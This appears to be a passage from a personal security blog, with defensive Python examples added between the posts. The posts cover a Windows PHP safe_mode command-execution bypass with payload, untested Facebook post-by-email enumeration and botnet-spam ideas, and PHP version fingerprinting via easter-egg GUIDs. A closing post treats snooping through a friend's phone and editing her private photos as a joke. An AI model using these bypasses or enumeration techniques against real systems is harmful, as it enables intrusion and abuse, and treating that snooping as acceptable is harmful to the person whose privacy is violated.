bypass

Safe_mode Bypass: PHP < 5.2.10

2:19 PM

Note: This method only works on Windows and wasn't discovered by me but by one of the greatest web researchers I know; I just had to share it.

So, to test this, make sure you have a PHP version lower than 5.2.10 on a Windows machine.
Make sure your php.ini has safe_mode set to On, or simply enable it on the command line:


C:\xampp\php>php -n -d safe_mode=on -r "exec('notepad');"

The command "/notepad" is either misspelled or could not be found.

So what does that tell us? It looks like all safe_mode does is add a "/" in front of whatever input we give it (which would be bad on its own). Aside from the many other bypasses you might think of, one that applies to Windows only is to put a backslash in front of the command:

C:\xampp\php>php -n -d safe_mode=on -r "exec('\calc');"

Aside from many errors being generated, the code still gets executed and notepad will now pop up.

So our final payload to execute commands while safe_mode is 1 is:

<?php exec('\echo "SHIT" >> notepad.txt'); ?>


This works with the exec(), passthru() and system() functions.
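The observation above is that safe_mode only glued a slash onto the command, and a leading backslash was enough to defeat that on Windows. The general lesson for anyone writing their own "only run things from this directory" check is that string prefixing is not confinement: resolve the path with the target platform's rules and test containment afterwards. The block below is an added illustration, not PHP's code; EXEC_DIR stands in for a hypothetical safe_mode_exec_dir (the runs in the post used -n, where that directory is empty), and Python's ntpath is used so the Windows resolution can be reproduced on any OS.

```python
import ntpath

# Hypothetical safe_mode_exec_dir (assumption for the example; the post's runs
# used -n, where it is empty and the observed prefix was just "/" + command).
EXEC_DIR = r"C:\xampp\safe_bin"


def naive_prefix(cmd):
    """Glue the exec dir, a slash and the command together, as the post observes
    safe_mode doing. This is string building, not a confinement check: the
    result starts with EXEC_DIR for every input, including rooted ones."""
    return EXEC_DIR + "/" + cmd


def resolves_inside(cmd, exec_dir=EXEC_DIR):
    """Resolve the command with Windows path rules (ntpath, so this runs on any
    OS) and accept it only if the normalized result still lies under exec_dir.
    A rooted component such as '\\calc' or '/calc' replaces the directory,
    '..' segments walk out of it, and another drive letter fails outright."""
    base = ntpath.normpath(exec_dir)
    target = ntpath.normpath(ntpath.join(exec_dir, cmd))
    try:
        return ntpath.commonpath([base, target]) == base
    except ValueError:
        # Different drives, or an absolute/relative mix: certainly not inside.
        return False


if __name__ == "__main__":
    for cmd in ("notepad", "tools\\notepad", "\\calc", "/notepad",
                "..\\..\\Windows\\System32\\calc", "D:\\calc"):
        print(f"{cmd!r:36} prefixed={naive_prefix(cmd)!r:46} "
              f"inside={resolves_inside(cmd)}")
```

The naive prefix passes a `startswith(EXEC_DIR)` check for `\calc` just as it does for `notepad`; only the resolved-path check tells them apart.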

bugbounty

Facebook: What If...?

9:58 AM


Note: None of these hunches have been tested, and I have no idea if they really work.

Status Update takeover

First, at https://www.facebook.com/pageusername/settings?tab=mobile Facebook gives pages an email address for posting a status update remotely. If you know that email, you can send any file to that *special* address from *any* email address and it will show up as a status file upload on your page.
For example, say my email is pXy251wiggly@m.facebook.com, which is very, very predictable to guess; emailing pXy251wiggly@m.facebook.com would result in my page getting a status update.

Since my name is Paulos Yibelo (pXy), 251 is my country code and wiggly is a random English dictionary word. I have since changed it to a custom one, so don't try it. :P But no, the *predictability* of the email isn't what I am trying to talk about.

The mail IDs are always 12 characters long if not customized (which is unlikely), and if you notice, they contain only lowercase letters and numbers, and half of the word is a dictionary word. Using this we can write an automated script to find the email, but note that we would find lots of emails in the process of finding the one we want, random ones. The testing part is the hard one: we need either zombies or a kickass bulk-mail program. Since the domain has no SPF record, it really does not matter who is sending it.
With a friend, we wrote a final Python script, at http://pastebin.com/7HfJ34Bg, to obtain all possible emails.

import random

# values only contain small letters and numbers
letters = 'abcdefghijklmnopqrstuvwxyz0123456789'

def generateWord():
    letter = ''
    for i in range(12):  # all possible values are 12 in length
        letter += random.choice(letters)
    return letter

# append generated values to the list; random picks can repeat, so the
# file needs de-duplicating afterwards
counter = 1
with open("wordList.txt", "a") as wordlist:
    while True:
        try:
            generated = generateWord() + "@m.facebook.com\n"
            wordlist.write(generated)
            print(counter, "words generated so far")
            counter += 1
        except KeyboardInterrupt:
            break

If the above script runs long enough, it will have all the possible combinations of emails Facebook (will ever) have, a number which keeps rising. Now we can multi-thread the process to speed it up, again and again.

Note: there is a low probability of finding a large amount of *actual* emails. Thanks to automation and kickass processing, it is possible.

Yes, it's less practical. But let's assume the 7b people around the globe have accounts. Assume I already ran that script and have the same database of users Facebook will ever have in a public database file. Assume I got 9 billion zombies/botnets that generally mass-mail 100 mails a second; that's 9^10*100 emails sent in a second. Generally assume all these zombies mail those in the public database, programmed to multi-thread so the process succeeds in a clean way. Now, in my theory, if it succeeds, it takes less than a month to mail all Facebook Page accounts. :)
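Two properties called out above make the feature risky: the address token is short and predictable, and nothing checks who sent the mail (no SPF on the domain). As an added example, not Facebook's code, here is how a post-by-email gateway could gate on both: look the recipient token up in a store of issued tokens, and accept the message only when the receiving mail server's Authentication-Results header records spf=pass and dkim=pass. PAGE_TOKENS, the posting domain and the three messages are constructed for the example.

```python
import email
from email import policy
from email.utils import parseaddr

# Constructed token store: local part of the address a page owner was issued.
# Hypothetical values, not real Facebook data.
PAGE_TOKENS = {"pxy251wiggly": "Example Page"}
POST_DOMAIN = "m.facebook.com"

# Constructed inbound messages. Authentication-Results is written by the
# receiving MTA, never trusted from the sender.
MSG_GOOD = b"""\
From: owner@example.org
To: pxy251wiggly@m.facebook.com
Subject: new status
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=example.org; dkim=pass header.d=example.org

Hello from my page.
"""

MSG_SPOOFED = b"""\
From: owner@example.org
To: pxy251wiggly@m.facebook.com
Subject: not really the owner
Authentication-Results: mx.example.net; spf=fail smtp.mailfrom=example.org; dkim=none

Sender was never authenticated.
"""

MSG_WRONG_TOKEN = b"""\
From: owner@example.org
To: zzzz0000abcd@m.facebook.com
Subject: guessed address
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=example.org; dkim=pass header.d=example.org

Token is not one we issued.
"""


def parse_auth_results(header_value):
    """Turn 'authserv-id; spf=pass ...; dkim=pass ...' into {'spf': 'pass',
    'dkim': 'pass'}. The first clause is the authserv-id and is skipped."""
    results = {}
    for clause in header_value.split(";")[1:]:
        clause = clause.strip()
        if not clause:
            continue
        method, _, result = clause.split()[0].partition("=")
        results[method.lower()] = result.lower()
    return results


def accept_status_update(raw):
    """Return (accepted, reason). Accepts only a known page token on the posting
    domain, and only when SPF and DKIM both passed at the receiving MTA."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    _, addr = parseaddr(str(msg["To"] or ""))
    local, _, domain = addr.rpartition("@")
    if domain.lower() != POST_DOMAIN:
        return False, "not addressed to the posting domain"
    if local.lower() not in PAGE_TOKENS:
        # Same terse reason for every unknown token: no hint about near misses.
        return False, "unknown page token"
    auth = parse_auth_results(str(msg["Authentication-Results"] or ""))
    if auth.get("spf") != "pass" or auth.get("dkim") != "pass":
        return False, f"sender not authenticated: {auth}"
    return True, f"post accepted for {PAGE_TOKENS[local.lower()]}"


if __name__ == "__main__":
    for name, raw in (("good", MSG_GOOD), ("spoofed", MSG_SPOOFED),
                      ("wrong token", MSG_WRONG_TOKEN)):
        print(name, "->", accept_status_update(raw))
```

The token lookup alone would still be defeated by a correct guess; the sender-authentication check is what removes the "it does not matter who is sending it" property, since a forged From: no longer gets through once the receiving server evaluates SPF and DKIM.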
 

Account ID Takeover

Facebook allows a user to create a username, and a profile can be accessed via facebook.com/username or facebook.com/profile.php?id=userid (or username). Demos include:
facebook.com/hyibelo
facebook.com/profile.php?id=hyibelo
facebook.com/profile.php?id=10000xxxxx

So the flaw here would be to override the ID by creating a username equal to the ID of an upcoming or already existing account that has no username. Meaning, if for example there is a guy with the ID 009834234 (not real), he can access his account via:

facebook.com/009834234
facebook.com/profile.php?id=009834234

But if we create a username equal to that ID from facebook.com/username, then when people navigate to his profile ID, they will land on our account, whose username is his ID.

Now Facebook doesn't allow all-numeric usernames. :)

websecurity

Abusing PHP's Easter Eggs: Revealing PHP Versions

1:09 PM

PHP comes with some easter eggs for fun. Today I will share the way I identify the PHP version of a website as an alternative method. It is useful for information gathering when traditional nmap scanning and the X-Powered-By header get filtered.

If you add the value "?=PHPE9568F36-D428-11d2-A769-00AA001ACF42" to the end of the URL of any PHP page, you will see a funny picture on *most* servers. Note that this trick does not work on big sites like Facebook.

There is a hidden function in PHP which is NOT documented in the php.net online manual: php_egg_logo_guid().
The function is defined as a preprocessor macro in php-src/ext/standard/info.h around line 54.

On April 1 (April Fools') the easter egg replaces the PHP logo on any phpinfo() page. If the PHP directive expose_php is set to "Off" in php.ini, the eggs will not show; it is "On" by default. Of the 3 web hosting servers I tried, none of them had changed it.

?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 is interesting. Below are the 6 different images that will be displayed, depending on the PHP version:


If the guy with breadsticks appeared: PHP 4.0.0 - 4.2.3
If the first brown dog appeared: PHP 4.3.0 - 4.3.10
If the black dog appeared: PHP 4.3.11 - 4.4.6, and 5.0.4 - 5.1.2
If the bunny appeared: PHP 5.0.0 - 5.0.3
If the colored PHP logo appeared: PHP 5.1.3 - 5.2.13
Or else, if the elephant appeared: PHP 5.3.0 - current

And as easy as that, we have our PHP version range.
The easter eggs also include ?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 for the PHP credits, which is an interface very similar to the phpinfo() page.
There is also ?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 to identify the Zend Engine PHP uses, which is an alternative way of version identification depending on the logo.
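Since expose_php = Off is the server-side fix and the three GUIDs above are constants, the same strings also make a cheap detection signature. The block below is an added example, not from the post: it scans constructed Apache combined-format access-log lines for the three egg query strings, tallies which eggs each source asked for, and flags sources that requested more than one, which is what a version-fingerprinting pass against a site looks like in the logs.

```python
import re
from collections import defaultdict

# The three query-string GUIDs from the post, mapped to what each one reveals.
EGG_GUIDS = {
    "PHPE9568F36-D428-11d2-A769-00AA001ACF42": "PHP logo (version-range fingerprint)",
    "PHPE9568F35-D428-11d2-A769-00AA001ACF42": "Zend Engine logo",
    "PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000": "PHP credits page",
}
EGG_BY_UPPER = {guid.upper(): what for guid, what in EGG_GUIDS.items()}

# "?=" followed by a PHP-prefixed GUID; case-insensitive because the GUIDs mix case.
EGG_RE = re.compile(
    r"\?=(PHP[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12})", re.I)

# Apache combined log format: ip ident user [time] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)')

# Constructed sample log lines (documentation IP ranges, not a real server).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Apr/2013:10:00:01 +0000] "GET /index.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2524 "-" "curl/7.29"
203.0.113.7 - - [01/Apr/2013:10:00:02 +0000] "GET /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 200 30120 "-" "curl/7.29"
198.51.100.4 - - [01/Apr/2013:10:00:03 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Apr/2013:10:00:04 +0000] "GET /about.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 2146 "-" "curl/7.29"
192.0.2.9 - - [01/Apr/2013:10:00:05 +0000] "GET /x.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 200 1843 "-" "python-requests/2.0"
"""


def find_egg_probes(log_text):
    """Return {source_ip: {description, ...}} for every request whose path
    carries one of the easter-egg GUIDs. Unparseable lines are skipped."""
    probes = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        g = EGG_RE.search(m["path"])
        if not g:
            continue
        what = EGG_BY_UPPER.get(g.group(1).upper(), "unknown PHP egg GUID")
        probes[m["ip"]].add(what)
    return dict(probes)


def fingerprinting_sources(log_text, min_distinct=2):
    """Sources that requested at least `min_distinct` different eggs. One egg may
    be curiosity; the logo, credits and Zend egg in sequence is a version scan."""
    return sorted(ip for ip, eggs in find_egg_probes(log_text).items()
                  if len(eggs) >= min_distinct)


if __name__ == "__main__":
    for ip, eggs in find_egg_probes(SAMPLE_LOG).items():
        print(ip, "->", sorted(eggs))
    print("fingerprinting:", fingerprinting_sources(SAMPLE_LOG))
```

Seeing these requests answered with 200 does not by itself prove the images were served, since a server with expose_php = Off just renders the page normally; the signature is useful for spotting the reconnaissance, and the php.ini setting is what stops the leak.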




Off topic: people need to listen to this amazing song. I loved it.

Happy Hacking :)

graphics design

Okay Photoshop Skills

3:48 PM


Well, a heads up: this isn't one of the security articles I do; in fact, this is more of a personal reminder that I might look up in 10 years or so and say "look, I wasn't that bad", or at least "I tried".

Just like every story, it happened a long time ago. So, a long time ago, I used to like graphics; I still do, especially motion graphics. I am familiar with most Adobe products like After Effects and Premiere Pro, but not Photoshop. So this is going to be, umm, the legacy of me taking to Photoshop.


So, after a friend accidentally left her phone in my room, I found some pictures of her (nice pictures, if you know what I mean? :P) and thought 'what the hell', let me edit some of those; it would kill me some time.

Not bad, right?